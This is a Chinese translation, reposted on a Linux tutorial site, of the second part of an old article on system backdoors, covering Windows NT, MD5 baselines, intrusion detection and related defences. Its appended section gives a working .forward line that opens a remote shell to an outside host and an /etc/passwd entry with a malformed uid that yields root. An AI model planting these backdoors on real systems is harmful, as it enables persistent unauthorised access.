当前位置:Linux教程 - Linux - 关于系统后门(2)

关于系统后门(2)



         Windows NT
    由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很 难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自 Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理 员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过网络通 行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic backdoors, theyarevery feasible for intruders to install on Windows NT. 此 处该如何翻译? :(

    解决

    当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.

    评估

    首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多 商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的 话,许多公司将大大提高安全性.

    MD5基准线

    一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前 由干净 系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些 公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现 有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复 了后门. 应该在入侵发生前作好基准线的建立.

    入侵检测

    随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前 多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和 网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协 议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的 原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.

    从CD-ROM启动

    一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法 的问题是实现的费用和时间够企业面临的.

    警告

    由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安 置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力! ( Be aware that no defense is foolproof, and that there is no substitute for diligent attention. 此句该如何翻译? :( )

    -------------------------------------------------------------------------

    you may want to add:

    .forward Backdoor

    On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account ``username‘‘ a .forward file might be constructed as follows:

    username |“/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh“

    permutations of this method include alteration of the systems mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing).

    PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on &nbs>

    the client and server).

    > Using smrsh can effectively negate this backdoor (although it‘s quite > possibly still a problem if you allow things like elm‘s filter or > procmail which can run programs themselves...).

    你也许要增加:

    .forward后门

    Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户‘username‘ 的 .forward可能设置如下:

    username |“/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh“

    这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只 是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行 任意命令(小部分预处理后). >利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm‘s filter或 procmail>类程序, 很有可能还有问题 ......)

    ( 此段的内容理解不深, 故付上英文, 请指教! )

    ---------------------------------------------------------------------------

    你也许能用这个“特性“做后门:

    当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查 出这个错误 的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利.

    例子:

    rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户rmartin的uid设为0. 本文所有权归作者所有!如要转载请保持文章完整性 绿色兵团 http://i.am/hack1/

    iamtheguest 译
    发布人:Crystal 来自:中国超级unix联盟